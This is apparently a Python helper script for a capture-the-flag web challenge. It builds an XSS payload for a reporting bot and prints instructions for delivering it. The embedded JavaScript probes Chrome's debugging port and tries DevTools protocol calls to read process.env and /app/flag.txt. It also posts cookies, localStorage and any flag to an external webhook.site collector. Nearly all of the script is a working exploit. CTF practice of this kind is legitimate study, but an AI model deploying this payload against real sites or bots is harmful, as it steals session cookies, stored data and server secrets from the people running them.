#!/usr/bin/env python3
"""
═══════════════════════════════════════════════════════════════════════════════
                    🎯 QUICK REFERENCE - CDP EXPLOITATION
═══════════════════════════════════════════════════════════════════════════════

WHAT YOU NEED TO KNOW:

1. The --no-sandbox flag enables Chrome DevTools Protocol (CDP) access
2. CDP allows reading process.env and file system from JavaScript
3. The flag is likely in: process.env.FLAG or /app/flag.txt
4. You already have XSS working ✅
5. Now you need to use CDP to read the flag

═══════════════════════════════════════════════════════════════════════════════
🚀 FASTEST PATH TO FLAG
═══════════════════════════════════════════════════════════════════════════════
"""

import urllib.parse

WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# The payload that tries everything at once
exploit_code = f"""
(async () => {{
    const w = '{WEBHOOK}';
    let flag = null;
    
    // Strategy 1: Try remote debugging port
    try {{
        const r = await fetch('http://localhost:9222/json');
        const data = await r.json();
        await fetch(w + '?step=debug_port_open', {{method:'POST', body:JSON.stringify(data)}});
        // TODO: If this works, use CDP over HTTP
    }} catch(e) {{}}
    
    // Strategy 2: Try to import DevTools and use CDP
    try {{
        const Main = await import('/devtools/main/main.js');
        
        // Read process.env.FLAG
        try {{
            const result = await Main.MainImpl.SendOverProtocol('Runtime.evaluate', {{
                expression: 'process.env.FLAG'
            }});
            flag = result.result.value;
            await fetch(w + '?FLAG=' + encodeURIComponent(flag));
        }} catch(e) {{}}
        
        // Try reading file
        if (!flag) {{
            const result = await Main.MainImpl.SendOverProtocol('Runtime.evaluate', {{
                expression: 'require("fs").readFileSync("/app/flag.txt","utf8")'
            }});
            flag = result.result.value;
            await fetch(w + '?FLAG=' + encodeURIComponent(flag));
        }}
    }} catch(e) {{
        await fetch(w + '?error=cdp_import_failed&msg=' + encodeURIComponent(e.toString()));
    }}
    
    // Strategy 3: Check standard locations (probably empty but worth trying)
    if (!flag) {{
        await fetch(w, {{
            method: 'POST',
            body: JSON.stringify({{
                cookie: document.cookie,
                localStorage: {{...localStorage}},
                windowFlag: window.FLAG || window.flag || null
            }})
        }});
    }}
}})();
"""

encoded = urllib.parse.quote(exploit_code.replace('\n', ' '))
payload = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'

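# Operator instructions. The payload built above is printed verbatim between
# horizontal rules so it can be copied out; the rule is built once here instead
# of being re-evaluated at every print.
_RULE = "═" * 80

print(_RULE)
print("STEP 1: Update webhook URL above (line 22)")
print(_RULE)
print("\nSTEP 2: Copy this payload:")
print(_RULE)
print(payload)
print(_RULE)
print("\nSTEP 3: Create a new paste with the payload")
print(_RULE)
print("\nSTEP 4: Report the paste to the bot")
print(_RULE)
print("\nSTEP 5: Check your webhook for:")
print("  • 'FLAG=' parameter → You got the flag! 🎉")
print("  • 'debug_port_open' → CDP available via HTTP")
print("  • 'cdp_import_failed' → Try alternative approaches")
print(_RULE)
print("\nIF CDP DOESN'T WORK:")
print("  1. The bot might not have debugging enabled")
print("  2. Try CDP_EXPLOIT_1_chrome_inspect.py (navigate to chrome://)")
print("  3. The flag might be set differently on remote")
print("  4. Check if bot source differs on actual challenge server")
print(_RULE)
print("\nREMEMBER:")
# Plain (non-f) string: doubled braces are not an escape here and were being
# printed literally as `{{fake_flag}}`, so the value is written with single braces.
print("  • Local FLAG = 'uoftctf{fake_flag}'")
print("  • Remote FLAG = actual challenge flag")
print("  • Same exploit works for both!")
print(_RULE)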
